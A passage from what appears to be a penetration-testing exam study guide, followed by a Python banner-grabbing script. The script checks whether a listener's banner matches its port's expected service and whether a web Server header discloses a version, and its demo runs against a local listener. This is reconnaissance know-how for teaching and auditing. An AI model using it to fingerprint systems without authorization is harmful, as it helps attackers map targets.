day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess, and move on!
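
Added example, not part of the flashcards, serving questions 66 and 70 above: a banner-grab check that does by script what the nc connection and the HTTP request on those cards do by hand. It flags a listener whose banner contradicts the protocol nmap's SERVICE column inferred from the port number (question 66), and a web server whose Server header discloses product and version (question 70). serve_once() is a throwaway local listener so the demo runs offline; the two banners are the ones printed on the cards, and the hosts, ports and signatures are constructed.

```python
"""Banner grabbing with a port-number sanity check and Server-header check.
A local one-shot listener replays the cards' banners so this runs offline."""
import re
import socket
import threading
from typing import Dict, List, Optional

# From the cards (question 66 and question 70).
SMTP_ON_80 = b"220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1)\r\n"
IIS_404 = (b"HTTP/1.1 404 Object Not Found\r\nServer: Microsoft-IIS/6.0\r\n"
           b"Content-Type: text/html\r\nContent-Length: 0\r\n\r\n")

# What nmap prints under SERVICE without -sV: a port-number lookup in
# nmap-services, not the result of talking to the listener.
EXPECTED_BY_PORT: Dict[int, str] = {22: "ssh", 25: "smtp", 80: "http", 443: "http"}

BANNER_SIGNATURES = [
    ("ssh", re.compile(r"^SSH-\d\.\d-")),
    ("smtp", re.compile(r"^220[ -].*\b(?:E?SMTP|Postfix|Exim|Sendmail)\b", re.I)),
    ("ftp", re.compile(r"^220[ -].*\bFTP\b", re.I)),
    ("http", re.compile(r"^HTTP/\d\.\d \d{3}")),
]


def grab_banner(host: str, port: int, probe: bytes = b"", timeout: float = 2.0) -> str:
    """Connect, optionally send a probe, return what the listener sends first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            data = s.recv(4096)
        except socket.timeout:
            data = b""
    return data.decode("latin-1", "replace")


def identify(banner: str) -> Optional[str]:
    """Classify a banner by its first line, independent of the port it came from."""
    first = banner.strip().splitlines()[0] if banner.strip() else ""
    for name, rx in BANNER_SIGNATURES:
        if rx.search(first):
            return name
    return None


def server_header(http_response: str) -> Optional[str]:
    m = re.search(r"^Server:\s*(.+?)\s*$", http_response, re.I | re.M)
    return m.group(1) if m else None


def audit(host: str, port: int, nominal_port: Optional[int] = None) -> Dict[str, object]:
    """Passive grab first (SSH, SMTP and FTP speak first); if the listener is
    silent, send a minimal HTTP request. `nominal_port` exists only so the
    demo's ephemeral listener can stand in for port 80."""
    banner = grab_banner(host, port)
    if not banner.strip():
        banner = grab_banner(host, port, probe=b"HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n" % host.encode())
    label_port = port if nominal_port is None else nominal_port
    expected = EXPECTED_BY_PORT.get(label_port)
    seen = identify(banner)
    findings: List[str] = []
    if seen and expected and seen != expected:
        findings.append(f"port {label_port}: labelled {expected} by port number, "
                        f"banner says {seen} (service on a non-standard port)")
    header = server_header(banner) if seen == "http" else None
    if header:
        findings.append(f"port {label_port}: Server header discloses {header!r}")
    return {"banner": banner.strip(), "identified": seen, "expected": expected, "findings": findings}


def serve_once(banner: bytes) -> int:
    """Demo-only listener on 127.0.0.1: accept one client, send `banner`,
    swallow anything the client sends, close. Returns the ephemeral port."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run() -> None:
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(1.0)
            conn.sendall(banner)
            try:
                conn.recv(1024)
            except OSError:
                pass
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    for raw in (SMTP_ON_80, IIS_404):
        result = audit("127.0.0.1", serve_once(raw), nominal_port=80)
        print(result["banner"].splitlines()[0])
        for finding in result["findings"]:
            print("  ", finding)
```

Against real targets drop `nominal_port` and pass the actual port; `nmap -sV` performs the same service-versus-port comparison with a far larger signature set, and this script exists to make visible what that comparison is doing.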